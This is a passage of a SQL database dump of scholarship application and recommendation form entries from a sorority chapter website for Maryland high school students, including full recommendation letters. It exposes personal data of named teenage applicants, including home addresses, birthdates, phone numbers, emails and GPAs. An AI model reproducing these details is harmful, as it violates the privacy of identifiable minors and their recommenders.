Assembly'),(2821,264,8,12,'House Delegate for District 12 - Howard and Baltimore Counties'),(2822,264,8,2,'terri.hill@house.state.md.us'),(2823,264,8,3,'Amaris Best Hester'),(2824,264,8,4,'2 years'),(2825,264,8,5,'Other'),(2826,264,8,6,'Mentor - Amaris has volunteered as both a legislative intern and campaign worker'),(2827,264,8,7,'N/A'),(2828,264,8,9,'Excellent'),(2829,264,8,8,'Excellent'),(2830,264,8,14,'Madam Chair and Committee Members,\r\nOver the years, I have had opportunity to advise and work with dozens of high school and college students as employees, interns, externs and mentees.  Additionally, as a surgical attending of nearly 30 years, I have interacted with, literally, hundreds of young residents in both supervisory and instructional capacities.   It is with this background that I write you with great pleasure and enthusiasm in support of Amaris Best Hester’s application for scholarship consideration as she enters college as a member of the Class of 2023.\r\n\r\nI first met Amaris when she volunteered as my legislative intern in the spring of 2017, during her sophomore year of high school.  She had completed a rewarding internship with a congressional campaign in 2016 and was looking to build on that experience by learning about the constituent service and legislative aspects of elected office.  I note that Amaris was not dissuaded, and contacting me directly, when she did not receive a response following the forwarding of her resume to me by a mentor. \r\n\r\nShe has since worked as an unpaid student intern on both my legislative and campaign staffs.  Her responsibilities have included supporting  and representing me at community events and ensuring that my senior staff was adequately debriefed on any constituent concerns raised, information requested, and contacts made so that appropriate and timely follow-up could be given.  She has also set up and facilitated at town hall meetings, served as photographer and designed flyers, helped address constituent problems, and synthesized and summarized workgroup product for possible legislative action.  \r\n\r\nMy staff and I have been impressed by her reliability and judgment and are comfortable asking her to take on responsibilities that we hesitate to ask of more experienced adults.  She took it upon herself to train in the use of voter database technology, and then accepted responsibility for coordinating campaign canvassing activity maps and lists, a critical part of the field work.  Mature beyond her years, her quiet demeanor is deceptive.  Confident and courteous, she handles conflict well, pressure with poise and maintenance of focus, and stress with equanimity.  \r\n\r\nAccomplished in a wide variety of academic and non-academic areas, Amaris’ record speaks for itself.  She is intelligent, organized, hard-working, self-effacing, resilient, eager to learn and appropriately assertive.  She steps up to new challenges, does not hesitate to ask questions, seeks and accepts direction and criticism, and has excellent communications and writing skills.   Amaris’ “whatever I can do to help” attitude is appreciated and, I’m sure, is a major reason that adults and peers look to her when leadership is needed.  \r\n\r\nIn summary, Amaris is a standout and will be an asset to whatever institution she chooses to attend.  Her thoughtfulness, determination, knowledge and work ethic will make her more than capable of meeting the challenges of the most rigorous curriculum.   Her resume speaks to her intellectual, speech and language skills, as well as her strengths as a change maker and leader.  She is not one to sit on the side hoping others will act when action is called for.  I am especially appreciative of these attributes in one so young and believe that they are consistent with the legacy embodied in the W. Ruth Conway Scholarship.  \r\n\r\nI strongly encourage your favorable review.'),(2831,264,8,16,'Highly recommended'),(2832,265,8,1.3,'Terri'),(2833,265,8,1.6,'Hill'),(2834,265,8,11,'Maryland General Assembly'),(2835,265,8,12,'State Delegate, District 12 - Baltimore and Howard Counties'),(2836,265,8,2,'terri.hill@house.state.md.us'),(2837,265,8,3,'Amaris Best Hester'),(2838,265,8,4,'2 years'),(2839,265,8,5,'Other'),(2840,265,8,6,'Mentor - Amaris volunteered as both my legislative intern and campaign worker/intern'),(2841,265,8,7,'N/A'),(2842,265,8,9,'Excellent'),(2843,265,8,8,'Excellent'),(2844,265,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/02/Amaris-Hester-zeta-Phi-Beta-scholarship-letter.docx'),(2845,265,8,16,'Highly recommended'),(2846,266,8,1.3,'Mary Ann'),(2847,266,8,1.6,'Sankey'),(2848,266,8,11,'9440 OLD FREDERICK RD'),(2849,266,8,12,'teacher'),(2850,266,8,2,'mary_sankey@hcpss.org'),(2851,266,8,3,'Nina St. Hillaire'),(2852,266,8,4,'2 1/2 years'),(2853,266,8,5,'Teacher/Professor'),(2854,266,8,7,'Excellent'),(2855,266,8,9,'Excellent'),(2856,266,8,8,'Excellent'),(2857,266,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/02/nina-sthilliaire-rec.docx'),(2858,266,8,16,'Highly recommended'),(2859,267,8,1.3,'Jillian'),(2860,267,8,1.6,'Hoffman'),(2861,267,8,11,'Howard High School'),(2862,267,8,12,'School Counselor'),(2863,267,8,2,'jillian_hoffman@hcpss.org'),(2864,267,8,3,'Kyle Wright'),(2865,267,8,4,'Three years'),(2866,267,8,5,'Advisor/Counselor'),(2867,267,8,7,'Average'),(2868,267,8,9,'Excellent'),(2869,267,8,8,'Excellent'),(2870,267,8,14,'See attached letter.'),(2871,267,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/02/written-evaluation-29.pdf'),(2872,267,8,16,'Recommended'),(2873,268,8,1.3,'Nick'),(2874,268,8,1.6,'Zaron'),(2875,268,8,11,'Howard high School'),(2876,268,8,12,'Computer Science Teacher'),(2877,268,8,2,'Nicholas_Zaron@hcpss.org'),(2878,268,8,3,'Kyle Wright'),(2879,268,8,4,'3 years'),(2880,268,8,5,'Teacher/Professor'),(2881,268,8,7,'Excellent'),(2882,268,8,9,'Excellent'),(2883,268,8,8,'Excellent'),(2884,268,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/02/kyle-wright-rec-letter.doc'),(2885,268,8,16,'Highly recommended'),(2886,269,8,1.3,'Melissa'),(2887,269,8,1.6,'Rhoton'),(2888,269,8,11,'Wilde Lake High School'),(2889,269,8,12,'world languages teacher'),(2890,269,8,2,'melissa_rhoton@hcpss.org'),(2891,269,8,3,'Layla Foster'),(2892,269,8,4,'4 years'),(2893,269,8,5,'Teacher/Professor'),(2894,269,8,7,'Excellent'),(2895,269,8,9,'Excellent'),(2896,269,8,8,'Excellent'),(2897,269,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/02/Layla-Foster-scholarship.docx'),(2898,269,8,16,'Highly recommended'),(2899,270,8,1.3,'William'),(2900,270,8,1.6,'Flick'),(2901,270,8,11,'Long Reach High School'),(2902,270,8,12,'math teacher'),(2903,270,8,2,'wbflrhs@yahoo.com'),(2904,270,8,3,'Javier Ramirez Marquez'),(2905,270,8,4,'two years'),(2906,270,8,5,'Teacher/Professor'),(2907,270,8,6,'He is my student aid this year'),(2908,270,8,7,'Excellent'),(2909,270,8,9,'Excellent'),(2910,270,8,8,'Excellent'),(2911,270,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/Javier.docx'),(2912,270,8,16,'Highly recommended'),(2913,271,10,1.3,'Cassandra'),(2914,271,10,1.6,'Belton'),(2915,271,10,3,'crbelton2@gmail.com'),(2916,271,10,5,'(347) 261-2326'),(2917,271,10,2,'Inactive Member (Reclaim)'),(2918,271,10,4,'Recently moved/settled in Columbia MD.\r\nI am interested in fellowship with my sisters.\r\nOriginally from Epsilon (NYC metro) \r\nSpr. 97\r\nI have been inactive for a few years now.\r\nI look forward to learning more about your chapter events.\r\nSisterly yours,\r\nCassandra Belton (Summons)'),(2919,272,6,18.3,'Javon'),(2920,272,6,18.6,'Daniel'),(2921,272,6,19.1,'6461 Quiet Night Ride'),(2922,272,6,19.3,'Columbia'),(2923,272,6,19.4,'Maryland'),(2924,272,6,19.5,'21044'),(2925,272,6,19.6,'United States'),(2926,272,6,4,'05-09-01'),(2927,272,6,21,'javondaniel@verizon.net'),(2928,272,6,20,'(443) 472-2270'),(2929,272,6,10,'Atholton High School'),(2930,272,6,27,'Friend/Family Member'),(2931,272,6,28,'N/A'),(2932,272,6,9,'2.98'),(2933,272,6,26,'Secondary Education'),(2934,272,6,12,'NA'),(2935,272,6,14,'Alpha Achievers \r\n2015-Present Member\r\n2017-Present Community Service Leader\r\nParticipated in Alpha Achievers at Atholton High School which targets African American males who maintain a 3.0 GPA and promotes leadership and community service\r\n\r\nTeam Sports\r\n2015-Present Varsity Basketball Atholton High School and Laurel Lakers\r\n2015-Present  Captain Varsity Cross Country Atholton High School\r\n2016-2017 Track & Field Atholton High School'),(2936,272,6,13,'2016-Present Honor Roll'),(2937,272,6,36,'Celebration Church\r\n2016-Present\r\nMultimedia volunteer who assists with broadcasting the service live to viewers around the world and communicates to the online viewers via chat\r\n\r\nSigma Beta Club Adopt A Road\r\n2016-Present\r\nHelped maintain healthy roads in the community by picking up trash with Phi Beta Sigma Fraternity, Inc. \r\n\r\nAlpha Achievers\r\n2015-Present\r\nProvided service for the residents at the Grassroots Center, clothing drives for the homeless, basketball with the Special Olympics'),(2938,272,6,37,'Towson University'),(2939,272,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/LGZ-Scholarship-Essay.docx'),(2940,272,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Javon-Daniel-Transcript.pdf'),(2941,272,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/LGZScholarshipReleaseForm-signed.pdf'),(2942,273,8,1.3,'Matthew'),(2943,273,8,1.6,'Quainoo'),(2944,273,8,11,'Celebration Church of Columbia'),(2945,273,8,12,'Deputy Pastor of Student Ministries'),(2946,273,8,2,'mquainoo@wininlife.com'),(2947,273,8,3,'Javon Daniel'),(2948,273,8,4,'3 years'),(2949,273,8,5,'Other'),(2950,273,8,6,'Deputy Pastor of Student Ministries'),(2951,273,8,7,'Excellent'),(2952,273,8,9,'Excellent'),(2953,273,8,8,'Excellent'),(2954,273,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/Javon-Daniel-Letter-of-Recommendation-Quainoo.docx'),(2955,273,8,16,'Highly recommended'),(2956,274,8,1.3,'Kathryn'),(2957,274,8,1.6,'Impeduglia'),(2958,274,8,11,'Atholton High'),(2959,274,8,12,'Teacher'),(2960,274,8,2,'Kathryn_Impeduglia@hcpss.org'),(2961,274,8,3,'Javon Daniel'),(2962,274,8,4,'2 years'),(2963,274,8,5,'Teacher/Professor'),(2964,274,8,7,'Excellent'),(2965,274,8,9,'Excellent'),(2966,274,8,8,'Excellent'),(2967,274,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/Javon-Daniel-LETTER-of-REC.pdf'),(2968,274,8,16,'Highly recommended'),(2969,275,8,1.3,'Crystal'),(2970,275,8,1.6,'Shelley'),(2971,275,8,11,'Atholton High School, Howard County Public School System'),(2972,275,8,12,'Classroom Teacher, Howard County Public Schools'),(2973,275,8,2,'crystal_shelley@hcpss.org'),(2974,275,8,3,'Aniyah Nelson'),(2975,275,8,4,'2 years'),(2976,275,8,5,'Teacher/Professor'),(2977,275,8,7,'Excellent'),(2978,275,8,9,'Excellent'),(2979,275,8,8,'Excellent'),(2980,275,8,14,'Dear College Admissions Officials, \r\nIt is with the utmost confidence that I recommend Aniyah Nelson to your institution. Aniyah was a student in my 2017-2018 Honors Modern World History class. I have always known Aniyah to be a kind, hardworking and thoughtful student.  \r\nAniyah always has a positive attitude and a smile on her face. She is a truly joyful person and a pleasure to have in the classroom. She contributes to class discussion, asks meaningful questions and provides important insights. Aniyah is a good advocate for her own learning. She has strived to improve her writing skills and has consulted with me for more help with her analysis and writing construction. She demonstrated great maturity in seeking help. The hard work she put in has helped her greatly improve her writing and overcome her challenges. She is a leader in the classroom in seeking to help others who miss class or don’t understand a concept. I feel confident that Aniyah will continue to shine as a student and member of our community throughout her senior year. She is truly a delight and your institution would be lucky to have her. \r\n	\r\nIf you have further questions about Aniyah please feel free to reach out. \r\n\r\nCrystal Shelley\r\nAtholton High School \r\n410-313-7065'),(2981,275,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/Aniya-Nelson-1.docx'),(2982,275,8,16,'Highly recommended'),(2983,276,6,18.3,'Oluwaseun'),(2984,276,6,18.6,'Sule'),(2985,276,6,19.1,'9468 sohap lane'),(2986,276,6,19.3,'columbia'),(2987,276,6,19.4,'Maryland'),(2988,276,6,19.5,'21045'),(2989,276,6,19.6,'United States'),(2990,276,6,4,'03-26-2001'),(2991,276,6,21,'seun3538@gmail.com'),(2992,276,6,20,'(202) 299-7429'),(2993,276,6,10,'Oakland Mills High School'),(2994,276,6,27,'BSAP Advisor'),(2995,276,6,28,'N/A'),(2996,276,6,9,'3.24'),(2997,276,6,26,'Health Sciences minor sport managment'),(2998,276,6,12,'NA'),(2999,276,6,14,'o	Sport Managment ( 1 year)\r\no	Pivot Intern(1 year)\r\no	Student Government Association (SGA)- Executive Board & Class Secertary (4 years)\r\no	National Honor Society (2 years)\r\no	Bullseye Running Club (3 years)'),(3000,276,6,13,'Honor Roll ( Every Year of High School)\r\nNational Honor Society Certification- October 2017\r\nThe Council of Elders of the Black Commmunity of Howard County(TCOE) Award- March 2019'),(3001,276,6,36,'DESTINY CHURCH 				COLUMBIA, MD    10/2017 – PRESENT\r\nDESTINY KIDS VOLUNTEER\r\n•	Participate with children in activities such as singing, board games, and Bible storytelling\r\n•	Used planner and implemented activities for the children that were cared for during each service\r\n•	Worked with children ranging from new borns to eleven years old \r\n\r\n HOLY CROSS HOSPITAL  SILVER SPRING, MD    04/2016 – 08/2016,  04/2017 – 08/2017, 04/2018 08/2018\r\nPEDIATRIC WARD VOLUNTEER\r\n•	Entertained patient 5 – 15 using arts and crafts. Performed all the documents filling.;Working as the liaison between the nursing staff and the patients.\r\n•	Assited nursing staff with transporting patients before and after surgery, assited with paper work, answered phone calls \r\n•	Worked together with patients family and directed on when they could see their loved one\r\n\r\nNATURALISTA HairEXPO (Annual Event)		COLLEGE PARK, MD    09/2017, 09/2018\r\nVOLUNTEER\r\n•	Assistance sales with new  products; Market the event through street walk, and distributed promotional campaign flyers, and samples products.\r\n•	Generated significant response at promotional booths. Part of tutorials (Hair, Face Paint, Fashion designs)\r\n•	Increased campus exposure of University of Maryland clubs by designing and introducing new product to students and faculty members.\r\n•	Collected, and enter attendees email for next year expo event into computer database for direct mail campaign.\r\nWBAL Concerts for Kids (Annual Event)		COLUMBIA, MD    12/2017, 12/2018\r\nVOLUNTEER\r\n•	Assited with setting up props for backage\r\n•	Assited in giving out snacks to parents and guest after intermission\r\n•	Helped direct students to backstage area'),(3002,276,6,37,'Mount St Mary\'s, NYU, Towson, Southern Methodist University, North Texas'),(3003,276,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Essay-Option-2.docx'),(3004,276,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Scanned-Documents-1.pdf'),(3005,276,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Scanned-Documents-2.pdf'),(3006,277,8,1.3,'Amy'),(3007,277,8,1.6,'Connor Axline'),(3008,277,8,11,'Oakland Mills High School'),(3009,277,8,12,'Chemistry Teacher/ Science Instructional Team Leader'),(3010,277,8,2,'amy_connoraxline@hcpss.org'),(3011,277,8,3,'Oluwaseun Sule'),(3012,277,8,4,'3 years'),(3013,277,8,5,'Teacher/Professor'),(3014,277,8,7,'Excellent'),(3015,277,8,9,'Excellent'),(3016,277,8,8,'Excellent'),(3017,277,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/Sule_RConway.pdf'),(3018,277,8,16,'Highly recommended'),(3019,278,8,1.3,'Jessica'),(3020,278,8,1.6,'Grady'),(3021,278,8,11,'Atholton High School'),(3022,278,8,12,'TEacher/Coach'),(3023,278,8,2,'jessica_grady@hcpss.org'),(3024,278,8,3,'Aniyah Nelson'),(3025,278,8,4,'4 years'),(3026,278,8,5,'Teacher/Professor'),(3027,278,8,7,'Excellent'),(3028,278,8,9,'Excellent'),(3029,278,8,8,'Excellent'),(3030,278,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/college-rec-aniyah-Nelson.docx'),(3031,278,8,16,'Highly recommended'),(3032,279,8,1.3,'Tonya'),(3033,279,8,1.6,'Grice'),(3034,279,8,11,'Long Reach High School'),(3035,279,8,12,'Black Student Achievement Program - Achievement Liaison'),(3036,279,8,2,'Tonya_Grice@hcpss.org'),(3037,279,8,3,'Ayana Monroe'),(3038,279,8,4,'three years'),(3039,279,8,5,'Advisor/Counselor'),(3040,279,8,7,'Excellent'),(3041,279,8,9,'Excellent'),(3042,279,8,8,'Excellent'),(3043,279,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/Recommendation-Ayana-Monroe-Ruth-Conway-Scholarship.docx'),(3044,279,8,16,'Highly recommended'),(3045,280,8,1.3,'tom'),(3046,280,8,1.6,'graham'),(3047,280,8,11,'world computer exchange'),(3048,280,8,12,'coordinator of the baltimore/washington chapter'),(3049,280,8,2,'tgraham@worldcomputerexchange.org'),(3050,280,8,3,'Ayana Monroe'),(3051,280,8,4,'two years'),(3052,280,8,5,'Other'),(3053,280,8,6,'I lead the group that Ayana serves as a volunteer.'),(3054,280,8,7,'N/A'),(3055,280,8,9,'Excellent'),(3056,280,8,8,'Excellent'),(3057,280,8,14,'Ayana Monroe has played an important role in broadening the reach of our nonprofit. She has recruited students from across Howard County to learn about World Computer Exchange, and she has made them feel welcome at the monthly gathering of our volunteers. She has energy, determination and helpful ideas, plus an attitude that inspires others to do their best.'),(3058,280,8,16,'Highly recommended'),(3059,281,8,1.3,'Deirdre'),(3060,281,8,1.6,'Lindsey'),(3061,281,8,11,'Atholton HS'),(3062,281,8,12,'GT Chemistry Teacher, Delta Scholars Honor Society Sponsor'),(3063,281,8,2,'deirdre.lindsey@gmail.com'),(3064,281,8,3,'Gloria Orgodi'),(3065,281,8,4,'six years'),(3066,281,8,5,'Teacher/Professor'),(3067,281,8,6,'In addition to teacher:  Mentor, Coach, and DS Honor Society Advisor'),(3068,281,8,7,'Excellent'),(3069,281,8,9,'Excellent'),(3070,281,8,8,'Excellent'),(3071,281,8,14,'12 March 2019\r\n\r\nAtholton High School\r\n6520 Freetown Rd.\r\nColumbia MD 21044\r\n\r\nRE: Gloria Ogordi\r\n\r\nDuring the past six years, in addition to teaching Gloria GT Chemistry, I have had the distinct pleasure of serving as her faculty advisor for Delta Scholars, as her mentor as well as her academic coach for Science Olympiad.  Gloria is one of the most skillful students I have known, especially at comprehending, assimilating and applying complex chemistry concepts.  She currently applies those same skills to each of her academic courses. Since I have known Gloria, I am impressed with her strong motivation to learn and achieve, her leadership skills and the thoroughness of her work.\r\n                 \r\nThroughout her high school experience, Gloria has participated in a variety of school, community groups, and activities including, Atholton student government, JROTC, It\'s Academic for JROTC and the Delta Scholars Honor Society. Gloria has also served as the Chairman on the Atholton Delta Scholars Executive Board.  Gloria has managed to balance the many hours of working outside of school and current responsibilities with her schoolwork.\r\n           \r\nThe aspect of Gloria’s personality that has left the biggest impression on me is her ability and willingness to organize and lead honor society members and to work with others toward a common goal.  Gloria does not seek recognition, but earns it through her efforts.  The serious disposition with which she approaches all of her goals in academic and extracurricular activities has earned her considerable respect with the faculty of Atholton High School and certainly with other groups as well.  Her innate leadership skills, creativity and desire for learning make her an excellent candidate.\r\n \r\nIf you have any questions, please feel free to contact me at the above address or at (410) 313-7065\r\n \r\nCordially,\r\n\r\nDeirdre Lindsey'),(3072,281,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/GloriaOrgordiRecommendation2019.docx'),(3073,281,8,16,'Highly recommended'),(3074,282,8,1.3,'Tracey'),(3075,282,8,1.6,'Rizzo'),(3076,282,8,11,'Marriotts Ridge High School'),(3077,282,8,12,'English teacher'),(3078,282,8,2,'tracey_rizzo@hcpss.org'),(3079,282,8,3,'Amaris Hester'),(3080,282,8,4,'1.5 years'),(3081,282,8,5,'Teacher/Professor'),(3082,282,8,7,'Excellent'),(3083,282,8,9,'Excellent'),(3084,282,8,8,'Excellent'),(3085,282,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/AmarisHester.doc'),(3086,282,8,16,'Highly recommended'),(3087,283,8,1.3,'Sandy'),(3088,283,8,1.6,'Harrington'),(3089,283,8,11,'Mount Hebron'),(3090,283,8,12,'Advisor of Delta Schlaors Club, Business and Marketing teacher'),(3091,283,8,2,'Sandy_Harrington@hcpss.org'),(3092,283,8,3,'Clarke Oliver'),(3093,283,8,4,'3 years'),(3094,283,8,5,'Teacher/Professor'),(3095,283,8,7,'Excellent'),(3096,283,8,9,'Excellent'),(3097,283,8,8,'Excellent'),(3098,283,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/Recommendation-letter-Teacher.JPG'),(3099,283,8,16,'Highly recommended'),(3100,284,8,1.3,'Tanya'),(3101,284,8,1.6,'Hall'),(3102,284,8,11,'Eve\'s Club'),(3103,284,8,12,'Chair'),(3104,284,8,2,'r2rfinds@gmail.com'),(3105,284,8,3,'Clarke Oliver'),(3106,284,8,4,'18 years'),(3107,284,8,5,'Other'),(3108,284,8,6,'Mentor'),(3109,284,8,7,'Excellent'),(3110,284,8,9,'Excellent'),(3111,284,8,8,'Excellent'),(3112,284,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/Recommendation-letter-Eves-Club.JPG'),(3113,284,8,16,'Highly recommended'),(3114,285,6,18.3,'Clarke'),(3115,285,6,18.6,'Oliver'),(3116,285,6,19.1,'8200 Edge Hill Ln'),(3117,285,6,19.3,'Ellicott City'),(3118,285,6,19.4,'MD'),(3119,285,6,19.5,'21043'),(3120,285,6,19.6,'United States'),(3121,285,6,4,'02/21/2001'),(3122,285,6,21,'clarkeoliver21@gmail.com'),(3123,285,6,20,'(443) 820-6446'),(3124,285,6,10,'Mt. Hebron High School'),(3125,285,6,27,'Friend/Family Member'),(3126,285,6,28,'N/A'),(3127,285,6,9,'4.0'),(3128,285,6,26,'Exercise Physiology'),(3129,285,6,12,'N/A'),(3130,285,6,14,'2017- Present		Delta Scholars:\r\nMaintain a GPA of 3.5 or above.\r\nPartake in community service activities.\r\nHold community bake sales to help the less fortunate.\r\nMaintain the values of culture, class, and confidence.\r\n\r\nWinter 2015- Present	   Mount Hebron Varsity Basketball:\r\nGain team-building experience and learn leadership skills.\r\nMade the team as a freshman which allowed me to gain seniority over the years.\r\nDeveloping more skills to help me grow as a player, such as a better IQ.\r\nHave the role of being a captain.\r\n\r\nSummer 2014- Present	Maryland Blazers Club Basketball:\r\nCondition and train with a team of girls who go to Howard County Schools.\r\nTravel to compete in tournaments against teams from all over the country.\r\nExplore visits to nearby colleges to see if we were interested in attending college there.'),(3131,285,6,13,'2015- Present		Mount Hebron Honor Roll Award\r\n2015-Present		Minds in Motion Award\r\nWinter 2015		        Most Improved on Varsity Basketball\r\nWinter 2016		         Unsung Hero on Varsity Basketball\r\nWinter 2017     		Most Improved Player on Varsity Basketball'),(3132,285,6,36,'2017-Present   		Helping Hands Club:\r\nVolunteer at Happy Helpers for the homeless.\r\nMade sandwiches and bagged foods to deliver at a soup kitchen.\r\n\r\n2017-Present		Canned Food Drive Delivery:\r\nStay after school to collect cans from classrooms.\r\nWork with the student government to organize them into groups for families.\r\nDeliver items to families in need.\r\n\r\nSummer 2016, 2017, 2018	  Camp Counselor for Youth Basketball Camp:\r\nHelped children from elementary to incoming freshman better understand the game of basketball.\r\nParticipated in games and competitions to demonstrate drills.\r\nSpent every day for 1 week from 5-9 pm. in the summertime to do non-profit work with the campers.'),(3133,285,6,37,'Committed to the University of East Carolina.'),(3134,285,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/grades.pdf'),(3135,285,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/EPSON302.PDF'),(3136,285,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/zeta-phi-beta.pdf'),(3137,286,8,1.3,'Jessica'),(3138,286,8,1.6,'Grady'),(3139,286,8,11,'Atholton High School'),(3140,286,8,12,'Teacher/Coach/Mentor'),(3141,286,8,2,'jessica_grady@hcpss.org'),(3142,286,8,3,'Kayla Mack-Easley'),(3143,286,8,4,'4 years'),(3144,286,8,5,'Teacher/Professor'),(3145,286,8,6,'As well as her coach, mentor'),(3146,286,8,7,'Excellent'),(3147,286,8,9,'Excellent'),(3148,286,8,8,'Excellent'),(3149,286,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/college-rec-kayla-mack.docx'),(3150,286,8,16,'Highly recommended'),(3151,287,8,1.3,'Jennieve'),(3152,287,8,1.6,'Hill'),(3153,287,8,11,'Wilde Lake High School'),(3154,287,8,12,'Teacher & Department Chair'),(3155,287,8,2,'Jennieve_Hill@hcpss.org'),(3156,287,8,3,'David Gordon'),(3157,287,8,4,'3 years'),(3158,287,8,5,'Teacher/Professor'),(3159,287,8,7,'Excellent'),(3160,287,8,9,'Excellent'),(3161,287,8,8,'Excellent'),(3162,287,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/David-Gordon.doc'),(3163,287,8,16,'Highly recommended'),(3164,288,8,1.3,'Rev. Mariah'),(3165,288,8,1.6,'Crews'),(3166,288,8,11,'Reid Temple A.M.E.'),(3167,288,8,12,'Youth Minister'),(3168,288,8,2,'mcrews@reidtemple.org'),(3169,288,8,3,'Nia Anderson'),(3170,288,8,4,'3+ Years'),(3171,288,8,5,'Other'),(3172,288,8,6,'I am her Youth Minister!'),(3173,288,8,7,'Excellent'),(3174,288,8,9,'Excellent'),(3175,288,8,8,'Excellent'),(3176,288,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/Recomendation-Letter-N-A-General.docx'),(3177,288,8,16,'Highly recommended'),(3178,289,8,1.3,'Scott'),(3179,289,8,1.6,'Brenfleck'),(3180,289,8,11,'Atholton High School'),(3181,289,8,12,'Teacher'),(3182,289,8,2,'scott_brenfleck@hcpss.org'),(3183,289,8,3,'Kayla Mack-Easley'),(3184,289,8,4,'3 years'),(3185,289,8,5,'Teacher/Professor'),(3186,289,8,7,'Excellent'),(3187,289,8,9,'Excellent'),(3188,289,8,8,'Excellent'),(3189,289,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/KME-Rec.doc'),(3190,289,8,16,'Highly recommended'),(3191,290,8,1.3,'William'),(3192,290,8,1.6,'Reinhart'),(3193,290,8,11,'Atholton High School'),(3194,290,8,12,'JROTC Senior Army Instructor'),(3195,290,8,2,'william_reinhart@hcpss.org'),(3196,290,8,3,'Danielle Floyd'),(3197,290,8,4,'4-years'),(3198,290,8,5,'Teacher/Professor'),(3199,290,8,7,'Excellent'),(3200,290,8,9,'Excellent'),(3201,290,8,8,'Excellent'),(3202,290,8,14,'I am delighted to have the opportunity to provide my endorsement of Danielle Floyd.  She is truly an impressive individual with high intellectual capacity, service commitment, and leadership.  She is a focused, driven, and mature individual.  Danielle has been in my JROTC program for what is now going on four years, so I speak from firsthand knowledge of her qualities, abilities, and potential.  \r\n\r\n   Danielle’s strengths are many and overarching is a level of maturity and diligence unseen in her peers.  She has the ability to envision a goal, organize and allocate resources, and then work steadily towards the accomplishment of that goal.  She has a strong work ethic and is tireless.  In JROTC, we’ve capitalized on this by assigning her as a member of the Battalion Staff, where she helps arrange training, operations, scheduling, and reporting for the whole JROTC Battalion.  Additionally, this year I’ve added the role of “Special Projects Officer” for Danielle.  As such she is given open ended, large scale, non-routine projects to enhance and grow what our battalion does.  For example, she has already arranged multiple large fund raising activities and is currently building a competition course and program for our military sweepstakes team.  During her time in JROTC, Danielle has fully dedicated herself to making this unit better, and in the process has improved herself and gained skills that set her apart.  Her performance within JROTC is indicative of who Danielle is and what she can and will accomplish.\r\n\r\n   Of course, Danielle’s talents don’t simply manifest themselves solely within the confines of JROTC.  Within the school, Danielle has been an active member on the Track Team; she is a member of the NHS and SNHS; and she was selected by the administration to be a part of the Student Leadership Council.  Additionally, last summer, Danielle won a scholarship to attend Girls State.  This opportunity not only helped further strengthen her leadership and self-confidence but gives a further indication about Danielle’s civic-mindedness.  Not only did she learn about our government and legislative process, Danielle was also elected as the Lieutenant Governor, a yearlong commitment to the promotion of Girls State. Clearly, Danielle not only understands the importance of being an active participant and serving within one’s community, she lives it and demonstrates it through her actions.  \r\n\r\n   As we know, our best students and highest performers have a thirst for knowledge, display an awareness of the world around them, and feel a commitment to public service.  Danielle has all of these special qualities.  She is truly a good person, a positive role model, and a future leader within our nation.  She follows in the finest traditions of previous W. Ruth Conway Scholars and in this content and without reservation, I endorse her application in the strongest way possible.'),(3203,290,8,16,'Highly recommended'),(3204,291,8,1.3,'Maureen'),(3205,291,8,1.6,'Marshall'),(3206,291,8,11,'HOward Community College'),(3207,291,8,12,'Associate Director, Career Links'),(3208,291,8,2,'mmarshall@howardcc.edu'),(3209,291,8,3,'Tierra Dixon'),(3210,291,8,4,'9 